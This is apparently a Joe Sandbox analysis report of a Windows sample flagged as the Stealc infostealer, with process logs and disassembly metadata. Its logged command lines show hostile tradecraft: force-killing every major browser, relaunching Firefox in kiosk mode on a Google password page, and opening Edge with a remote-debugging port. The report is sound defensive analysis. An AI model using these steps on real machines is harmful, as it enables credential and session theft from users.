Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:42:52
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"
Imagebase:	0x7f0000
File size:	965'632 bytes
MD5 hash:	D99F0062878EA8743875AC2F12FEB7D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:42:55
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:42:55
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:42:57
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:42:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:42:58
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:42:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:42:58
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:42:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:42:59
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xd0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:42:59
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:42:59
Start date:	13/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:42:59
Start date:	13/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:42:59
Start date:	13/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:43:02
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe"
Imagebase:	0x3c0000
File size:	1'818'112 bytes
MD5 hash:	106C3E2370747EF310E8952FD337895C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000003.2522812356.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000002.3208807770.00000000003C1000.00000040.00000001.01000000.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000002.3211612383.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	14:43:02
Start date:	13/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2212 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1110a5b-abe5-4b46-a8d5-e81b4ffdee10} 7540 "\\.\pipe\gecko-crash-server-pipe.7540" 20db436d510 socket
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	14:43:03
Start date:	13/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:43:06
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"
Imagebase:	0x7f0000
File size:	965'632 bytes
MD5 hash:	D99F0062878EA8743875AC2F12FEB7D6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	1387
Total number of Limit Nodes:	44

Executed Functions

Function 00E3652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00E3652A,?,?,?,?,?,00E37661), ref: 00E36567

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5bd2f0837cb823ed058d116a4d692a7cedc9a8cf33387956e1cf1532eaff4fdf
Instruction ID: fab6b4919a7f795fa5f74e902d8a00ce6796645214a7d62273b430a33fb90e0a
Opcode Fuzzy Hash: 5bd2f0837cb823ed058d116a4d692a7cedc9a8cf33387956e1cf1532eaff4fdf
Instruction Fuzzy Hash: 6EE08C30000208BFCE35BBA8CD1DA483F69EB4174DF10AC24F90966222CB25ED83C690

Function 00E05C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00E06098
00000422, xrefs: 00E060C9
0000043f, xrefs: 00E0612B
00000423, xrefs: 00E060FA
Keyboard Layout\Preload, xrefs: 00E06054

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 5a97ab983f97e571322385f2f85c072833dd368144a83988c463be608f9e5d6c
Instruction ID: 0e5d306078f647a3588fedbb847e178efad50ae4c28872493953ff2551b19126
Opcode Fuzzy Hash: 5a97ab983f97e571322385f2f85c072833dd368144a83988c463be608f9e5d6c
Instruction Fuzzy Hash: 4FF1E171A0024CABEB24DF54CD88BDEBBB9EB45304F504699E908B72C1DB749AC4CF95

Function 00E09BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 15fb39aebb0ef11064df2339197a822fec6a983aee7237cade79640e36c1cb5f
Instruction ID: 252f56ea569fb5a02e64edb89491881de35175f041782490b4215175431715e3
Opcode Fuzzy Hash: 15fb39aebb0ef11064df2339197a822fec6a983aee7237cade79640e36c1cb5f
Instruction Fuzzy Hash: C731F571B042049BFB08DF78ED897ADB7A2EBC5324F249218E014B73D7CB7559C18651

Function 00E09F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
